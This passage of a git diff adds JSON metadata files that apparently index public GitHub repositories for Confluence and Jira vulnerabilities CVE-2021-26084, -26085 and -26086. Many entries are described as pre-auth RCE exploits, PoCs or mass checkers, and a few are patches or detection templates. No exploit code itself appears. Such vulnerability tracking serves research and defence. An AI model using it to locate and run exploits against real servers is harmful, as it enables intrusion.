+ "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-26084-scanner", + "description": "CVE-2021-26084 Remote Code Execution on Confluence Servers", + "fork": false, + "created_at": "2021-09-01T12:28:41Z", + "updated_at": "2021-09-01T12:29:57Z", + "pushed_at": "2021-09-01T12:33:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402068353, + "name": "CVE-2021-26084", + "full_name": "CrackerCat\/CVE-2021-26084", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-26084", + "description": "Atlassian Confluence Pre-Auth RCE", + "fork": false, + "created_at": "2021-09-01T13:20:13Z", + "updated_at": "2021-09-01T13:20:14Z", + "pushed_at": "2021-09-01T12:55:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 402086975, + "name": "CVE-2021-26084", + "full_name": "b1gw00d\/CVE-2021-26084", + "owner": { + "login": "b1gw00d", + "id": 7240776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7240776?v=4", + "html_url": "https:\/\/github.com\/b1gw00d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1gw00d\/CVE-2021-26084", + "description": "批量检测", + "fork": false, + "created_at": "2021-09-01T14:16:29Z", + "updated_at": "2021-12-16T03:04:33Z", + "pushed_at": "2021-09-01T12:51:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402107915, + "name": "CVE-2021-26084", + "full_name": "taythebot\/CVE-2021-26084", + "owner": { + "login": "taythebot", + "id": 60461479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60461479?v=4", + "html_url": "https:\/\/github.com\/taythebot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taythebot\/CVE-2021-26084", + "description": "CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)", + "fork": false, + "created_at": "2021-09-01T15:19:19Z", + "updated_at": "2024-03-12T09:16:42Z", + "pushed_at": "2021-09-08T13:40:02Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 402126120, + "name": "CVE-2021-26084_GoPOC", + "full_name": "bcdannyboy\/CVE-2021-26084_GoPOC", + "owner": { + "login": "bcdannyboy", + "id": 12553297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4", + "html_url": "https:\/\/github.com\/bcdannyboy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bcdannyboy\/CVE-2021-26084_GoPOC", + "description": "PoC of CVE-2021-26084 written in Golang based on https:\/\/twitter.com\/jas502n\/status\/1433044110277890057?s=20", + "fork": false, + "created_at": "2021-09-01T16:17:35Z", + "updated_at": "2024-06-05T13:33:34Z", + "pushed_at": "2021-09-01T16:18:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 402267593, + "name": "cve-2021-26084-confluence", + "full_name": "smallpiggy\/cve-2021-26084-confluence", + "owner": { + "login": "smallpiggy", + "id": 44887613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44887613?v=4", + "html_url": "https:\/\/github.com\/smallpiggy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smallpiggy\/cve-2021-26084-confluence", + "description": "Just run command without brain", + "fork": false, + "created_at": "2021-09-02T02:41:49Z", + "updated_at": "2021-09-02T02:42:17Z", + "pushed_at": "2021-09-02T02:42:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402323962, + "name": "CVE-2021-26084", + "full_name": "maskerTUI\/CVE-2021-26084", + "owner": { + "login": "maskerTUI", + "id": 3371449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3371449?v=4", + "html_url": "https:\/\/github.com\/maskerTUI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maskerTUI\/CVE-2021-26084", + "description": "This is exploit", + "fork": false, + "created_at": "2021-09-02T07:05:23Z", + "updated_at": "2021-09-02T07:07:25Z", + "pushed_at": "2021-09-02T07:07:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 402400207, + "name": "CVE-2021-26084-Nuclei-template", + "full_name": "BeRserKerSec\/CVE-2021-26084-Nuclei-template", + "owner": { + "login": "BeRserKerSec", + "id": 72992256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72992256?v=4", + "html_url": "https:\/\/github.com\/BeRserKerSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BeRserKerSec\/CVE-2021-26084-Nuclei-template", + "description": "This nuclei template is to verify the vulnerability without executing any commands to the target machine ", + "fork": false, + "created_at": "2021-09-02T11:47:10Z", + "updated_at": "2021-12-09T13:36:55Z", + "pushed_at": "2021-09-02T11:50:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 402654322, + "name": "CVE-2021-26084", + "full_name": "p0nymc1\/CVE-2021-26084", + "owner": { + "login": "p0nymc1", + "id": 88642465, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88642465?v=4", + "html_url": "https:\/\/github.com\/p0nymc1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0nymc1\/CVE-2021-26084", + "description": "CVE-2021-26084", + "fork": false, + "created_at": "2021-09-03T05:14:46Z", + "updated_at": "2022-02-09T07:33:26Z", + "pushed_at": "2021-09-03T08:54:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402687741, + "name": "CVE-2021-26084", + "full_name": "Loneyers\/CVE-2021-26084", + "owner": { + "login": "Loneyers", + "id": 29177120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29177120?v=4", + "html_url": "https:\/\/github.com\/Loneyers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Loneyers\/CVE-2021-26084", + "description": "CVE-2021-26084 Confluence OGNL injection", + "fork": false, + "created_at": "2021-09-03T07:41:36Z", + "updated_at": "2021-12-27T09:00:16Z", + "pushed_at": "2021-09-03T07:45:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 402698165, + "name": "cve_2021_26084", + "full_name": "Xc1Ym\/cve_2021_26084", + "owner": { + "login": "Xc1Ym", + "id": 29765332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29765332?v=4", + "html_url": "https:\/\/github.com\/Xc1Ym", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xc1Ym\/cve_2021_26084", + "description": "cve-2021-26084 EXP", + "fork": false, + "created_at": "2021-09-03T08:22:21Z", + "updated_at": "2021-09-03T08:22:58Z", + "pushed_at": "2021-09-03T08:22:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 403083297, + "name": "confluence-rce-poc", + "full_name": "wolf1892\/confluence-rce-poc", + "owner": { + "login": "wolf1892", + "id": 24608781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24608781?v=4", + "html_url": "https:\/\/github.com\/wolf1892", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wolf1892\/confluence-rce-poc", + "description": "Setting up POC for CVE-2021-26084", + "fork": false, + "created_at": "2021-09-04T14:53:38Z", + "updated_at": "2021-09-04T15:16:43Z", + "pushed_at": "2021-09-04T15:16:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 403266565, + "name": "CVE-2021-26084", + "full_name": "smadi0x86\/CVE-2021-26084", + "owner": { + "login": "smadi0x86", + "id": 75253629, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75253629?v=4", + "html_url": "https:\/\/github.com\/smadi0x86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smadi0x86\/CVE-2021-26084", + "description": "Confluence server webwork OGNL injection", + "fork": false, + "created_at": "2021-09-05T09:27:55Z", + "updated_at": "2024-06-11T09:23:37Z", + "pushed_at": "2023-06-06T17:26:44Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve-2021-26084", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 403517544, + "name": "CVE-2021-26084-Confluence-OGNL", + "full_name": "kkin77\/CVE-2021-26084-Confluence-OGNL", + "owner": { + "login": "kkin77", + "id": 20243850, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20243850?v=4", + "html_url": "https:\/\/github.com\/kkin77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkin77\/CVE-2021-26084-Confluence-OGNL", + "description": "asjhdsajdlksavksapfoka", + "fork": false, + "created_at": "2021-09-06T06:56:44Z", + "updated_at": "2022-09-30T06:16:15Z", + "pushed_at": "2021-09-06T06:56:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 403800717, + "name": "CVE-2021-26084", + "full_name": "1ZRR4H\/CVE-2021-26084", + "owner": { + "login": "1ZRR4H", + "id": 42696639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42696639?v=4", + "html_url": "https:\/\/github.com\/1ZRR4H", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1ZRR4H\/CVE-2021-26084", + "description": "Atlassian Confluence CVE-2021-26084 one-liner mass checker", + "fork": false, + "created_at": "2021-09-07T01:15:16Z", + "updated_at": "2024-08-12T20:16:13Z", + "pushed_at": "2021-09-07T12:59:45Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 403962659, + "name": "cve-2021-26084-confluence", + "full_name": "GlennPegden2\/cve-2021-26084-confluence", + "owner": { + "login": "GlennPegden2", + "id": 34956796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34956796?v=4", + "html_url": "https:\/\/github.com\/GlennPegden2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GlennPegden2\/cve-2021-26084-confluence", + "description": "A quick and dirty PoC of cve-2021-26084 as none of the existing ones worked for me.", + "fork": false, + "created_at": "2021-09-07T12:04:09Z", + "updated_at": "2023-01-10T03:23:11Z", + "pushed_at": "2021-09-07T15:09:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 404381633, + "name": "docker-confluence-patched", + "full_name": "toowoxx\/docker-confluence-patched", + "owner": { + "login": "toowoxx", + "id": 60697748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60697748?v=4", + "html_url": "https:\/\/github.com\/toowoxx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toowoxx\/docker-confluence-patched", + "description": "Patched Confluence 7.12.2 (CVE-2021-26084)", + "fork": false, + "created_at": "2021-09-08T14:35:37Z", + "updated_at": "2023-12-05T14:09:31Z", + "pushed_at": "2021-09-17T12:45:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 404430174, + "name": "CVE-2021-26084-patch-", + "full_name": "nizar0x1f\/CVE-2021-26084-patch-", + "owner": { + "login": "nizar0x1f", + "id": 44277400, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44277400?v=4", + "html_url": "https:\/\/github.com\/nizar0x1f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nizar0x1f\/CVE-2021-26084-patch-", + "description": "CVE-2021-26084 patch as provided in \"Confluence Security Advisory - 2021-08-25\"", + "fork": false, + "created_at": "2021-09-08T17:05:16Z", + "updated_at": "2021-09-08T17:29:07Z", + "pushed_at": "2021-09-08T17:28:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 404662155, + "name": "CVE-2021-26084", + "full_name": "attacker-codeninja\/CVE-2021-26084", + "owner": { + "login": "attacker-codeninja", + "id": 73088331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73088331?v=4", + "html_url": "https:\/\/github.com\/attacker-codeninja", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/attacker-codeninja\/CVE-2021-26084", + "description": "Confluence OGNL injection", + "fork": false, + "created_at": "2021-09-09T09:29:24Z", + "updated_at": "2021-09-09T09:29:25Z", + "pushed_at": "2021-09-09T06:52:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 407790631, + "name": "CVE-2021-26084_PoC", + "full_name": "ludy-dev\/CVE-2021-26084_PoC", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/CVE-2021-26084_PoC", + "description": "[CVE-2021-26084] Confluence pre-auth RCE test script", + "fork": false, + "created_at": "2021-09-18T07:33:24Z", + "updated_at": "2021-12-01T09:03:37Z", + "pushed_at": "2021-09-21T08:33:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 412676582, + "name": "CVE-2021-26084", + "full_name": "wdjcy\/CVE-2021-26084", + "owner": { + "login": "wdjcy", + "id": 6531850, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6531850?v=4", + "html_url": "https:\/\/github.com\/wdjcy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wdjcy\/CVE-2021-26084", + "description": null, + "fork": false, + "created_at": "2021-10-02T03:11:50Z", + "updated_at": "2021-10-02T03:16:43Z", + "pushed_at": "2021-10-02T03:16:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414400971, + "name": "CVE-2021-26084", + "full_name": "orangmuda\/CVE-2021-26084", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-26084", + "description": "CVE-2021-26084 - Confluence Server Webwork OGNL injection ", + "fork": false, + "created_at": "2021-10-06T23:24:24Z", + "updated_at": "2024-08-12T20:17:03Z", + "pushed_at": "2022-01-27T06:16:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 419246152, + "name": "CVE-2021-26084_Confluence", + "full_name": "TheclaMcentire\/CVE-2021-26084_Confluence", + "owner": { + "login": "TheclaMcentire", + "id": 86812068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86812068?v=4", + "html_url": "https:\/\/github.com\/TheclaMcentire", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheclaMcentire\/CVE-2021-26084_Confluence", + "description": "Exploit CVE 2021 26084 Confluence", + "fork": false, + "created_at": "2021-10-20T08:27:58Z", + "updated_at": "2024-01-19T02:45:12Z", + "pushed_at": "2021-09-08T11:04:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 420861154, + "name": "CVE-2021-26084", + "full_name": "Jun-5heng\/CVE-2021-26084", + "owner": { + "login": "Jun-5heng", + "id": 88525975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4", + "html_url": "https:\/\/github.com\/Jun-5heng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2021-26084", + "description": "confluence远程代码执行RCE \/ Code By:Jun_sheng", + "fork": false, + "created_at": "2021-10-25T03:07:28Z", + "updated_at": "2022-01-02T13:22:29Z", + "pushed_at": "2022-04-18T03:37:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421299784, + "name": "CVE-2021-26084", + "full_name": "lleavesl\/CVE-2021-26084", + "owner": { + "login": "lleavesl", + "id": 91398948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91398948?v=4", + "html_url": "https:\/\/github.com\/lleavesl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lleavesl\/CVE-2021-26084", + "description": "CVE-2021-26084,Atlassian Confluence OGNL注入漏洞", + "fork": false, + "created_at": "2021-10-26T06:01:38Z", + "updated_at": "2022-09-03T22:05:44Z", + "pushed_at": "2021-10-27T02:30:40Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431232449, + "name": "conflucheck", + "full_name": "quesodipesto\/conflucheck", + "owner": { + "login": "quesodipesto", + "id": 13822638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13822638?v=4", + "html_url": "https:\/\/github.com\/quesodipesto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quesodipesto\/conflucheck", + "description": "Python 3 script to identify CVE-2021-26084 via network requests.", + "fork": false, + "created_at": "2021-11-23T19:45:31Z", + "updated_at": "2021-11-24T19:02:52Z", + "pushed_at": "2021-11-24T19:02:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439271937, + "name": "Confluence-CVE-2021-26084", + "full_name": "30579096\/Confluence-CVE-2021-26084", + "owner": { + "login": "30579096", + "id": 27181766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27181766?v=4", + "html_url": "https:\/\/github.com\/30579096", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/30579096\/Confluence-CVE-2021-26084", + "description": "OGNL Injection in Confluence server version < 7.12.5", + "fork": false, + "created_at": "2021-12-17T09:04:55Z", + "updated_at": "2022-01-19T15:47:35Z", + "pushed_at": "2021-09-03T07:37:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 447489190, + "name": "CVE-2021-26084", + "full_name": "ZZ-SOCMAP\/CVE-2021-26084", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2021-26084", + "description": "POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection Vulneralibity.", + "fork": false, + "created_at": "2022-01-13T06:29:51Z", + "updated_at": "2024-09-19T01:54:41Z", + "pushed_at": "2022-01-14T04:21:27Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 661577991, + "name": "CVE-2021-26084-EXP", + "full_name": "vpxuser\/CVE-2021-26084-EXP", + "owner": { + "login": "vpxuser", + "id": 109720761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109720761?v=4", + "html_url": "https:\/\/github.com\/vpxuser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vpxuser\/CVE-2021-26084-EXP", + "description": null, + "fork": false, + "created_at": "2023-07-03T07:31:29Z", + "updated_at": "2023-09-11T11:40:35Z", + "pushed_at": "2023-07-05T05:32:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-26084", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793039722, + "name": "CVE-2021-26084", + "full_name": "nahcusira\/CVE-2021-26084", + "owner": { + "login": "nahcusira", + "id": 87233531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87233531?v=4", + "html_url": "https:\/\/github.com\/nahcusira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nahcusira\/CVE-2021-26084", + "description": null, + "fork": false, + "created_at": "2024-04-28T08:56:30Z", + "updated_at": "2024-05-06T15:13:35Z", + "pushed_at": "2024-05-06T15:13:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807402056, + "name": "Confluence-RCE", + "full_name": "BBD-YZZ\/Confluence-RCE", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/Confluence-RCE", + "description": "confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)", + "fork": false, + "created_at": "2024-05-29T03:20:22Z", + "updated_at": "2024-09-22T06:25:09Z", + "pushed_at": "2024-08-26T09:24:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26085.json b/2021/CVE-2021-26085.json new file mode 100644 index 0000000000..1fdc5a4952 --- /dev/null +++ b/2021/CVE-2021-26085.json @@ -0,0 +1,37 @@ +[ + { + "id": 413731751, + "name": "CVE-2021-26085", + "full_name": "ColdFusionX\/CVE-2021-26085", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2021-26085", + "description": "Atlassian Confluence Server 7.5.1 Pre-Authorization Arbitrary File Read vulnerability (CVE-2021-26085)", + "fork": false, + "created_at": "2021-10-05T08:20:25Z", + "updated_at": "2024-08-12T20:16:58Z", + "pushed_at": "2021-10-12T05:08:47Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve-2021-26085", + "file-read-vulnerability" + ], + "visibility": "public", + "forks": 5, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26086.json b/2021/CVE-2021-26086.json new file mode 100644 index 0000000000..8756fd7667 --- /dev/null +++ b/2021/CVE-2021-26086.json @@ -0,0 +1,68 @@ +[ + { + "id": 403189408, + "name": "CVE-2021-26086", + "full_name": "Jeromeyoung\/CVE-2021-26086", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-26086", + "description": "Confluence OGNL Injection [CVE-2021-26084].", + "fork": false, + "created_at": "2021-09-05T01:28:23Z", + "updated_at": "2023-07-28T03:28:19Z", + "pushed_at": "2021-09-04T13:57:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 413844972, + "name": "CVE-2021-26086", + "full_name": "ColdFusionX\/CVE-2021-26086", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2021-26086", + "description": "Atlassian Jira Server\/Data Center 8.4.0 - Arbitrary File read (CVE-2021-26086)", + "fork": false, + "created_at": "2021-10-05T14:09:52Z", + "updated_at": "2024-08-12T20:16:59Z", + "pushed_at": "2021-10-12T05:16:48Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-26086", + "file-read-vulnerability", + "jira" + 